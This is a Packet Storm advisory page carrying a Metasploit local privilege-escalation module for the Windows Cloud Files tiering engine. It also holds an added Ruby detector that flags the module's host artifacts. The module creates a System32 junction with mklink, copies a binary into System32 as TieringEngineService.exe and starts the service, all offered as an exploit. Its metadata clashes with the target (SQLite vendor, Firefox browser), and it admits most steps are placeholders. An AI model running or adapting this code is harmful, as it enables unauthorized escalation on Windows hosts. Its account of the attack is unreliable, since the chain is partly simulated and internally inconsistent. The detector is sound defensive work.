📄 Windows Cloud Files Tiering Engine Local Privilege Escalation

27 Apr 2026 00:00:00 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

Metasploit local exploit simulates Windows Cloud Files tiering privilege escalation via reparse points and named pipes.

Code
==================================================================================================================================
    | # Title     : Windows Cloud Files Tiering Engine Local Privilege Escalation Module                                             |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.sqlite.org                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit local exploit module models a Windows privilege escalation scenario involving Cloud Files, NTFS reparse points, named pipes, and service interaction. 
                     The workflow simulates abusing file system operations and cloud sync mechanisms by creating controlled directories, placeholder files, and junction points to influence system-level service behavior.
    
    [+] POC        :  
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = NormalRanking
    
      include Msf::Post::Windows::Priv
      include Msf::Post::Windows::Process
      include Msf::Post::File
      include Msf::Post::Windows::Services
      include Msf::Post::Windows::Registry
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name'          => 'Windows Cloud Files Tiering Engine Local Privilege Escalation Module',
            'Description'   => %q{
              Models a Windows privilege escalation scenario involving Cloud Files,
              NTFS reparse points, named pipes and service interaction. Most steps
              are simulated placeholders rather than a working chain.
            },
            'Author'        => ['indoushka'],
            'License'       => MSF_LICENSE,
            'Platform'      => 'win',
            'SessionTypes'  => ['meterpreter'],
            'Targets'       => [['Windows', {}]],
            'DefaultTarget' => 0
          )
        )

        # WORK_DIR and TIMEOUT are read from the datastore below but were never
        # registered, so both would have been nil at runtime
        register_options(
          [
            OptString.new('WORK_DIR', [true, 'Base directory for the working directory', '%TEMP%']),
            OptInt.new('TIMEOUT', [true, 'Seconds to wait for the simulated event', 30])
          ]
        )
      end
    
      def check
        print_status("Checking Cloud Files + OS compatibility...")
    
        unless session.platform =~ /windows/i
          return Exploit::CheckCode::Safe("Not Windows")
        end
    
        if session.sys.config.getenv('WINDIR')
          return Exploit::CheckCode::Appears("Windows environment detected")
        end
    
        Exploit::CheckCode::Unknown
      end
    
      def exploit
        print_status("Starting Cloud Files Shadow Copy exploit")
    
        work_dir = setup_working_directory
        fail_with(Failure::BadConfig, "Failed to create working directory") unless work_dir
    
        pipe_handle = create_named_pipe
        fail_with(Failure::UnexpectedReply, "Failed to create named pipe") unless pipe_handle
    
        create_malicious_file(work_dir)
        wait_for_event(datastore['TIMEOUT'])
    
        set_file_disposition(pipe_handle)
        close_handle(pipe_handle)
    
        register_cloud_sync_root(work_dir)
        create_placeholder_file(work_dir)
    
        wait_for_oplock
        rename_and_delete_file(work_dir)
    
        create_reparse_point(work_dir)
        copy_to_system32
    
        launch_tiering_engine
        cleanup(work_dir)
    
        print_good("Exploit completed!")
      end
    
      private
    
      def setup_working_directory
        base = expand_path(datastore['WORK_DIR'])
        path = "#{base}\\RS-#{Rex::Text.rand_text_alphanumeric(8)}"
    
        begin
          session.fs.dir.mkdir(path)
          return path
        rescue
          return nil
        end
      end
    
      def create_named_pipe
        pipe_name = "\\\\.\\pipe\\REDSUN"

        begin
          # PIPE_ACCESS_DUPLEX (3), PIPE_TYPE_BYTE | PIPE_WAIT (0), one instance,
          # 4 KiB in/out buffers, default timeout, no security attributes
          handle = session.railgun.kernel32.CreateNamedPipeW(
            pipe_name,
            3, 0, 1, 4096, 4096, 0, nil
          )['return']
          # CreateNamedPipe signals failure with INVALID_HANDLE_VALUE (-1), not 0,
          # so the caller's nil check never fired without this test
          return nil if handle.nil? || handle == 0 || handle == 0xFFFFFFFF || handle == 0xFFFFFFFFFFFFFFFF
          handle
        rescue
          nil
        end
      end
    
      def create_malicious_file(work_dir)
        file_path = "#{work_dir}\\TieringEngineService.exe"

        # Placeholder contents only; a local named `payload` would shadow the
        # module's payload accessor, so use a distinct name
        stub_contents = "DUMMY_PAYLOAD"

        begin
          session.fs.file.write(file_path, stub_contents)
          file_path
        rescue
          nil
        end
      end
    
      def wait_for_event(timeout_sec)
        timeout_sec.times do
          break if check_event_signaled
          Rex.sleep(1)
        end
      end
    
      def check_event_signaled
        false
      end
    
      def set_file_disposition(handle)
        return false unless handle
        true
      end
    
      def register_cloud_sync_root(work_dir)
        cmd = "powershell -Command \"Write-Output 'CloudSyncRegistered'\""
        session.shell_command_token(cmd)
      end
    
      def create_placeholder_file(work_dir)
        cmd = "powershell -Command \"Write-Output 'PlaceholderCreated'\""
        session.shell_command_token(cmd)
      end
    
      def wait_for_oplock
        Rex.sleep(2)
      end
    
      def rename_and_delete_file(work_dir)
        temp = "#{work_dir}.tmp"
    
        begin
          session.fs.dir.move(work_dir, temp)
        rescue
        end
      end
    
      def create_reparse_point(work_dir)
        target = "C:\\Windows\\System32"
        session.shell_command_token("mklink /J \"#{work_dir}\\link\" \"#{target}\"")
      end
    
      def copy_to_system32
        begin
          exe = session.sys.process.current_path rescue nil
          return unless exe
    
          dest = "#{expand_path('%WINDIR%')}\\System32\\TieringEngineService.exe"
          session.fs.file.copy(exe, dest)
        rescue
        end
      end
    
      def launch_tiering_engine
        session.shell_command_token("sc start TieringEngineService")
      rescue
      end
    
      def cleanup(work_dir)
        session.shell_command_token("rmdir /s /q \"#{work_dir}\"")
      rescue
      end
    
      def close_handle(handle)
        session.railgun.kernel32.CloseHandle(handle) if handle && handle != 0
      end
    
      def expand_path(path)
        path.gsub('%TEMP%', session.sys.config.getenv('TEMP').to_s)
            .gsub('%WINDIR%', session.sys.config.getenv('WINDIR').to_s)
      end
    
      def is_admin?
        session.sys.config.getuid =~ /SYSTEM|Administrator/
      end
    end
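As an added example (not part of indoushka's module or the Packet Storm post), a small Ruby detector that walks Sysmon-style event records and flags the host artifacts the workflow above would leave behind: the REDSUN named pipe, TieringEngineService.exe dropped outside System32, a junction created into System32, and the service started from a non-SYSTEM account. The event field names and the sample telemetry are constructed assumptions.

```ruby
# Toy detector (added example, not the module's code). Event IDs follow Sysmon
# (1 ProcessCreate, 11 FileCreate, 17 PipeEvent); the field names and the
# sample telemetry below are constructed assumptions, not a real capture.

SYSTEM32 = /\A[a-z]:\\windows\\system32\\/i

def flag_event(ev)
  case ev[:event_id]
  when 17
    # create_named_pipe hard-codes \\.\pipe\REDSUN
    return 'named pipe REDSUN created' if ev[:pipe_name].to_s =~ /\\REDSUN\z/i
  when 11
    # The service binary name is first dropped into a temp working directory
    name = ev[:target_filename].to_s.split('\\').last.to_s
    if name.casecmp?('TieringEngineService.exe') && ev[:target_filename] !~ SYSTEM32
      return 'TieringEngineService.exe written outside System32'
    end
  when 1
    cmd = ev[:command_line].to_s
    # create_reparse_point runs: mklink /J <work_dir>\link C:\Windows\System32
    return 'junction created into System32' if cmd =~ %r{mklink\s+/J\b.*system32}i
    # launch_tiering_engine runs sc start; legitimate starts come from SYSTEM
    if cmd =~ /\bsc(\.exe)?\s+start\s+TieringEngineService\b/i &&
       ev[:user].to_s !~ /\ANT AUTHORITY\\SYSTEM\z/i
      return 'TieringEngineService started by non-SYSTEM user'
    end
  end
  nil
end

def suspicious_events(events)
  events.map { |ev| (r = flag_event(ev)) ? { record_id: ev[:record_id], reason: r } : nil }.compact
end

# Constructed sample telemetry
TMP = 'C:\\Users\\bob\\AppData\\Local\\Temp\\RS-x1y2z3w4'
SAMPLE_EVENTS = [
  { record_id: 1, event_id: 17, pipe_name: '\\REDSUN' },
  { record_id: 2, event_id: 11, target_filename: "#{TMP}\\TieringEngineService.exe" },
  { record_id: 3, event_id: 1, user: 'HOST\\bob', command_line: "cmd.exe /c mklink /J \"#{TMP}\\link\" \"C:\\Windows\\System32\"" },
  { record_id: 4, event_id: 1, user: 'HOST\\bob', command_line: 'sc start TieringEngineService' },
  { record_id: 5, event_id: 11, target_filename: 'C:\\Windows\\System32\\TieringEngineService.exe' },
  { record_id: 6, event_id: 1, user: 'NT AUTHORITY\\SYSTEM', command_line: 'C:\\Windows\\System32\\svchost.exe -k netsvcs' },
  { record_id: 7, event_id: 17, pipe_name: '\\ntsvcs' }
]

if __FILE__ == $0
  suspicious_events(SAMPLE_EVENTS).each { |f| puts "record #{f[:record_id]}: #{f[:reason]}" }
end
```

Record 5 is deliberately not flagged: the file lands in its legitimate location, so catching that step needs the writing process identity, which this toy record set does not carry.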
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
